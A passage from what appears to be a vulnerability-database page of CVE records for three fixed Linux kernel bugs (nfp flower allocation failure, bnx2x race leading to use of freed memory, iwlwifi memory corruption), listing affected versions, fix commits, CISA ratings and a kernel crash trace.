"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c8df9203bf22c66fa26e8d8c7f8ce181cf88099d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9d8eb1238377cd994829f9162ae396a84ae037b2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/84e95149bd341705f0eca6a7fcb955c548805002"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/netronome/nfp/flower/lag_conf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d746889db75a76aeee95fb705b8e1ac28c684a2e",
"status": "affected",
"version": "bb9a8d031140f186d13d82f57b0f5646d596652f",
"versionType": "git"
},
{
"lessThan": "3b1e8a617eb0f4cdc19def530047a95b5abde07d",
"status": "affected",
"version": "bb9a8d031140f186d13d82f57b0f5646d596652f",
"versionType": "git"
},
{
"lessThan": "928705e341010dd910fdece61ccb974f494a758f",
"status": "affected",
"version": "bb9a8d031140f186d13d82f57b0f5646d596652f",
"versionType": "git"
},
{
"lessThan": "0d387dc503f9a53e6d1f6e9dd0292d38f083eba5",
"status": "affected",
"version": "bb9a8d031140f186d13d82f57b0f5646d596652f",
"versionType": "git"
},
{
"lessThan": "c9b4e220dd18f79507803f38a55d53b483f6c9c3",
"status": "affected",
"version": "bb9a8d031140f186d13d82f57b0f5646d596652f",
"versionType": "git"
},
{
"lessThan": "408ba7fd04f959c61b50db79c983484312fea642",
"status": "affected",
"version": "bb9a8d031140f186d13d82f57b0f5646d596652f",
"versionType": "git"
},
{
"lessThan": "c8df9203bf22c66fa26e8d8c7f8ce181cf88099d",
"status": "affected",
"version": "bb9a8d031140f186d13d82f57b0f5646d596652f",
"versionType": "git"
},
{
"lessThan": "9d8eb1238377cd994829f9162ae396a84ae037b2",
"status": "affected",
"version": "bb9a8d031140f186d13d82f57b0f5646d596652f",
"versionType": "git"
},
{
"lessThan": "84e95149bd341705f0eca6a7fcb955c548805002",
"status": "affected",
"version": "bb9a8d031140f186d13d82f57b0f5646d596652f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/netronome/nfp/flower/lag_conf.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.18"
},
{
"lessThan": "4.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfp: flower: handle acti_netdevs allocation failure\n\nThe kmalloc_array() in nfp_fl_lag_do_work() will return null, if\nthe physical memory has run out. As a result, if we dereference\nthe acti_netdevs, the null pointer dereference bugs will happen.\n\nThis patch adds a check to judge whether allocation failure occurs.\nIf it happens, the delayed work will be rescheduled and try again."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:03:02.921Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d746889db75a76aeee95fb705b8e1ac28c684a2e"
},
{
"url": "https://git.kernel.org/stable/c/3b1e8a617eb0f4cdc19def530047a95b5abde07d"
},
{
"url": "https://git.kernel.org/stable/c/928705e341010dd910fdece61ccb974f494a758f"
},
{
"url": "https://git.kernel.org/stable/c/0d387dc503f9a53e6d1f6e9dd0292d38f083eba5"
},
{
"url": "https://git.kernel.org/stable/c/c9b4e220dd18f79507803f38a55d53b483f6c9c3"
},
{
"url": "https://git.kernel.org/stable/c/408ba7fd04f959c61b50db79c983484312fea642"
},
{
"url": "https://git.kernel.org/stable/c/c8df9203bf22c66fa26e8d8c7f8ce181cf88099d"
},
{
"url": "https://git.kernel.org/stable/c/9d8eb1238377cd994829f9162ae396a84ae037b2"
},
{
"url": "https://git.kernel.org/stable/c/84e95149bd341705f0eca6a7fcb955c548805002"
}
],
"title": "nfp: flower: handle acti_netdevs allocation failure",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27046",
"datePublished": "2024-05-01T12:54:21.725Z",
"dateReserved": "2024-02-19T14:20:24.213Z",
"dateUpdated": "2025-05-04T09:03:02.921Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26859 (GCVE-0-2024-26859)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 08:58
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/bnx2x: Prevent access to a freed page in page_pool
Fix race condition leading to system crash during EEH error handling
During EEH error recovery, the bnx2x driver's transmit timeout logic
could cause a race condition when handling reset tasks. The
bnx2x_tx_timeout() schedules reset tasks via bnx2x_sp_rtnl_task(),
which ultimately leads to bnx2x_nic_unload(). In bnx2x_nic_unload()
SGEs are freed using bnx2x_free_rx_sge_range(). However, this could
overlap with the EEH driver's attempt to reset the device using
bnx2x_io_slot_reset(), which also tries to free SGEs. This race
condition can result in system crashes due to accessing freed memory
locations in bnx2x_free_rx_sge()
799 static inline void bnx2x_free_rx_sge(struct bnx2x *bp,
800 struct bnx2x_fastpath *fp, u16 index)
801 {
802 struct sw_rx_page *sw_buf = &fp->rx_page_ring[index];
803 struct page *page = sw_buf->page;
....
where sw_buf was set to NULL after the call to dma_unmap_page()
by the preceding thread.
EEH: Beginning: 'slot_reset'
PCI 0011:01:00.0#10000: EEH: Invoking bnx2x->slot_reset()
bnx2x: [bnx2x_io_slot_reset:14228(eth1)]IO slot reset initializing...
bnx2x 0011:01:00.0: enabling device (0140 -> 0142)
bnx2x: [bnx2x_io_slot_reset:14244(eth1)]IO slot reset --> driver unload
Kernel attempted to read user page (0) - exploit attempt? (uid: 0)
BUG: Kernel NULL pointer dereference on read at 0x00000000
Faulting instruction address: 0xc0080000025065fc
Oops: Kernel access of bad area, sig: 11 [#1]
.....
Call Trace:
[c000000003c67a20] [c00800000250658c] bnx2x_io_slot_reset+0x204/0x610 [bnx2x] (unreliable)
[c000000003c67af0] [c0000000000518a8] eeh_report_reset+0xb8/0xf0
[c000000003c67b60] [c000000000052130] eeh_pe_report+0x180/0x550
[c000000003c67c70] [c00000000005318c] eeh_handle_normal_event+0x84c/0xa60
[c000000003c67d50] [c000000000053a84] eeh_event_handler+0xf4/0x170
[c000000003c67da0] [c000000000194c58] kthread+0x1c8/0x1d0
[c000000003c67e10] [c00000000000cf64] ret_from_kernel_thread+0x5c/0x64
To solve this issue, we need to verify page pool allocations before
freeing.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 4cace675d687ebd2d813e90af80ff87ee85202f9 Version: 4cace675d687ebd2d813e90af80ff87ee85202f9 Version: 4cace675d687ebd2d813e90af80ff87ee85202f9 Version: 4cace675d687ebd2d813e90af80ff87ee85202f9 Version: 4cace675d687ebd2d813e90af80ff87ee85202f9 Version: 4cace675d687ebd2d813e90af80ff87ee85202f9 Version: 4cace675d687ebd2d813e90af80ff87ee85202f9 Version: 4cace675d687ebd2d813e90af80ff87ee85202f9 Version: 4cace675d687ebd2d813e90af80ff87ee85202f9 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26859",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-23T14:02:31.556726Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:21:09.772Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.698Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7bcc090c81116c66936a7415f2c6b1483a4bcfd9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4f37d3a7e004bbf560c21441ca9c022168017ec4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8eebff95ce9558be66a36aa7cfb43223f3ab4699"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8ffcd3ccdbda0c918c4a0f922ef1c17010f1b598"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cf7d8cba639ae792a42c2a137b495eac262ac36c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3a9f78b297e08ca8e88ae3ecff1f6fe2766dc5eb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c51f8b6930db3f259b8820b589f2459d2df3fc68"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/44f9f1abb0ecc43023225ab9539167facbabf0ec"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d27e2da94a42655861ca4baea30c8cd65546f25d"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7bcc090c81116c66936a7415f2c6b1483a4bcfd9",
"status": "affected",
"version": "4cace675d687ebd2d813e90af80ff87ee85202f9",
"versionType": "git"
},
{
"lessThan": "4f37d3a7e004bbf560c21441ca9c022168017ec4",
"status": "affected",
"version": "4cace675d687ebd2d813e90af80ff87ee85202f9",
"versionType": "git"
},
{
"lessThan": "8eebff95ce9558be66a36aa7cfb43223f3ab4699",
"status": "affected",
"version": "4cace675d687ebd2d813e90af80ff87ee85202f9",
"versionType": "git"
},
{
"lessThan": "8ffcd3ccdbda0c918c4a0f922ef1c17010f1b598",
"status": "affected",
"version": "4cace675d687ebd2d813e90af80ff87ee85202f9",
"versionType": "git"
},
{
"lessThan": "cf7d8cba639ae792a42c2a137b495eac262ac36c",
"status": "affected",
"version": "4cace675d687ebd2d813e90af80ff87ee85202f9",
"versionType": "git"
},
{
"lessThan": "3a9f78b297e08ca8e88ae3ecff1f6fe2766dc5eb",
"status": "affected",
"version": "4cace675d687ebd2d813e90af80ff87ee85202f9",
"versionType": "git"
},
{
"lessThan": "c51f8b6930db3f259b8820b589f2459d2df3fc68",
"status": "affected",
"version": "4cace675d687ebd2d813e90af80ff87ee85202f9",
"versionType": "git"
},
{
"lessThan": "44f9f1abb0ecc43023225ab9539167facbabf0ec",
"status": "affected",
"version": "4cace675d687ebd2d813e90af80ff87ee85202f9",
"versionType": "git"
},
{
"lessThan": "d27e2da94a42655861ca4baea30c8cd65546f25d",
"status": "affected",
"version": "4cace675d687ebd2d813e90af80ff87ee85202f9",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.2"
},
{
"lessThan": "4.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "4.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/bnx2x: Prevent access to a freed page in page_pool\n\nFix race condition leading to system crash during EEH error handling\n\nDuring EEH error recovery, the bnx2x driver\u0027s transmit timeout logic\ncould cause a race condition when handling reset tasks. The\nbnx2x_tx_timeout() schedules reset tasks via bnx2x_sp_rtnl_task(),\nwhich ultimately leads to bnx2x_nic_unload(). In bnx2x_nic_unload()\nSGEs are freed using bnx2x_free_rx_sge_range(). However, this could\noverlap with the EEH driver\u0027s attempt to reset the device using\nbnx2x_io_slot_reset(), which also tries to free SGEs. This race\ncondition can result in system crashes due to accessing freed memory\nlocations in bnx2x_free_rx_sge()\n\n799 static inline void bnx2x_free_rx_sge(struct bnx2x *bp,\n800\t\t\t\tstruct bnx2x_fastpath *fp, u16 index)\n801 {\n802\tstruct sw_rx_page *sw_buf = \u0026fp-\u003erx_page_ring[index];\n803 struct page *page = sw_buf-\u003epage;\n....\nwhere sw_buf was set to NULL after the call to dma_unmap_page()\nby the preceding thread.\n\n EEH: Beginning: \u0027slot_reset\u0027\n PCI 0011:01:00.0#10000: EEH: Invoking bnx2x-\u003eslot_reset()\n bnx2x: [bnx2x_io_slot_reset:14228(eth1)]IO slot reset initializing...\n bnx2x 0011:01:00.0: enabling device (0140 -\u003e 0142)\n bnx2x: [bnx2x_io_slot_reset:14244(eth1)]IO slot reset --\u003e driver unload\n Kernel attempted to read user page (0) - exploit attempt? (uid: 0)\n BUG: Kernel NULL pointer dereference on read at 0x00000000\n Faulting instruction address: 0xc0080000025065fc\n Oops: Kernel access of bad area, sig: 11 [#1]\n .....\n Call Trace:\n [c000000003c67a20] [c00800000250658c] bnx2x_io_slot_reset+0x204/0x610 [bnx2x] (unreliable)\n [c000000003c67af0] [c0000000000518a8] eeh_report_reset+0xb8/0xf0\n [c000000003c67b60] [c000000000052130] eeh_pe_report+0x180/0x550\n [c000000003c67c70] [c00000000005318c] eeh_handle_normal_event+0x84c/0xa60\n [c000000003c67d50] [c000000000053a84] eeh_event_handler+0xf4/0x170\n [c000000003c67da0] [c000000000194c58] kthread+0x1c8/0x1d0\n [c000000003c67e10] [c00000000000cf64] ret_from_kernel_thread+0x5c/0x64\n\nTo solve this issue, we need to verify page pool allocations before\nfreeing."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:58:08.974Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7bcc090c81116c66936a7415f2c6b1483a4bcfd9"
},
{
"url": "https://git.kernel.org/stable/c/4f37d3a7e004bbf560c21441ca9c022168017ec4"
},
{
"url": "https://git.kernel.org/stable/c/8eebff95ce9558be66a36aa7cfb43223f3ab4699"
},
{
"url": "https://git.kernel.org/stable/c/8ffcd3ccdbda0c918c4a0f922ef1c17010f1b598"
},
{
"url": "https://git.kernel.org/stable/c/cf7d8cba639ae792a42c2a137b495eac262ac36c"
},
{
"url": "https://git.kernel.org/stable/c/3a9f78b297e08ca8e88ae3ecff1f6fe2766dc5eb"
},
{
"url": "https://git.kernel.org/stable/c/c51f8b6930db3f259b8820b589f2459d2df3fc68"
},
{
"url": "https://git.kernel.org/stable/c/44f9f1abb0ecc43023225ab9539167facbabf0ec"
},
{
"url": "https://git.kernel.org/stable/c/d27e2da94a42655861ca4baea30c8cd65546f25d"
}
],
"title": "net/bnx2x: Prevent access to a freed page in page_pool",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26859",
"datePublished": "2024-04-17T10:27:23.709Z",
"dateReserved": "2024-02-19T14:20:24.183Z",
"dateUpdated": "2025-05-04T08:58:08.974Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26610 (GCVE-0-2024-26610)
Vulnerability from cvelistv5
Published
2024-02-29 15:52
Modified
2025-05-04 08:52
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: iwlwifi: fix a memory corruption
iwl_fw_ini_trigger_tlv::data is a pointer to a __le32, which means that
if we copy to iwl_fw_ini_trigger_tlv::data + offset while offset is in
bytes, we'll write past the buffer.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: cf29c5b66b9f83939367d90679eb68cdfa2f0356 Version: cf29c5b66b9f83939367d90679eb68cdfa2f0356 Version: cf29c5b66b9f83939367d90679eb68cdfa2f0356 Version: cf29c5b66b9f83939367d90679eb68cdfa2f0356 Version: cf29c5b66b9f83939367d90679eb68cdfa2f0356 Version: cf29c5b66b9f83939367d90679eb68cdfa2f0356 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26610",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-12T18:22:31.931608Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:49:28.637Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.572Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/05dd9facfb9a1e056752c0901c6e86416037d15a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/99a23462fe1a6f709f0fda3ebbe8b6b193ac75bd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/aa2cc9363926991ba74411e3aa0a0ea82c1ffe32"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/870171899d75d43e3d14360f3a4850e90a9c289b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f32a81999d0b8e5ce60afb5f6a3dd7241c17dd67"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cf4a0d840ecc72fcf16198d5e9c505ab7d5a5e4d"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "05dd9facfb9a1e056752c0901c6e86416037d15a",
"status": "affected",
"version": "cf29c5b66b9f83939367d90679eb68cdfa2f0356",
"versionType": "git"
},
{
"lessThan": "99a23462fe1a6f709f0fda3ebbe8b6b193ac75bd",
"status": "affected",
"version": "cf29c5b66b9f83939367d90679eb68cdfa2f0356",
"versionType": "git"
},
{
"lessThan": "aa2cc9363926991ba74411e3aa0a0ea82c1ffe32",
"status": "affected",
"version": "cf29c5b66b9f83939367d90679eb68cdfa2f0356",
"versionType": "git"
},
{
"lessThan": "870171899d75d43e3d14360f3a4850e90a9c289b",
"status": "affected",
"version": "cf29c5b66b9f83939367d90679eb68cdfa2f0356",
"versionType": "git"
},
{
"lessThan": "f32a81999d0b8e5ce60afb5f6a3dd7241c17dd67",
"status": "affected",
"version": "cf29c5b66b9f83939367d90679eb68cdfa2f0356",
"versionType": "git"
},
{
"lessThan": "cf4a0d840ecc72fcf16198d5e9c505ab7d5a5e4d",
"status": "affected",
"version": "cf29c5b66b9f83939367d90679eb68cdfa2f0356",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/intel/iwlwifi/iwl-dbg-tlv.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.5"
},
{
"lessThan": "5.5",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "5.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: iwlwifi: fix a memory corruption\n\niwl_fw_ini_trigger_tlv::data is a pointer to a __le32, which means that\nif we copy to iwl_fw_ini_trigger_tlv::data + offset while offset is in\nbytes, we\u0027ll write past the buffer."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:52:16.227Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/05dd9facfb9a1e056752c0901c6e86416037d15a"
},
{
"url": "https://git.kernel.org/stable/c/99a23462fe1a6f709f0fda3ebbe8b6b193ac75bd"
},
{
"url": "https://git.kernel.org/stable/c/aa2cc9363926991ba74411e3aa0a0ea82c1ffe32"
},
{
"url": "https://git.kernel.org/stable/c/870171899d75d43e3d14360f3a4850e90a9c289b"
},
{
"url": "https://git.kernel.org/stable/c/f32a81999d0b8e5ce60afb5f6a3dd7241c17dd67"
},
{
"url": "https://git.kernel.org/stable/c/cf4a0d840ecc72fcf16198d5e9c505ab7d5a5e4d"
}
],
"title": "wifi: iwlwifi: fix a memory corruption",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26610",
"datePublished": "2024-02-29T15:52:15.796Z",
"dateReserved": "2024-02-19T14:20:24.130Z",
"dateUpdated": "2025-05-04T08:52:16.227Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
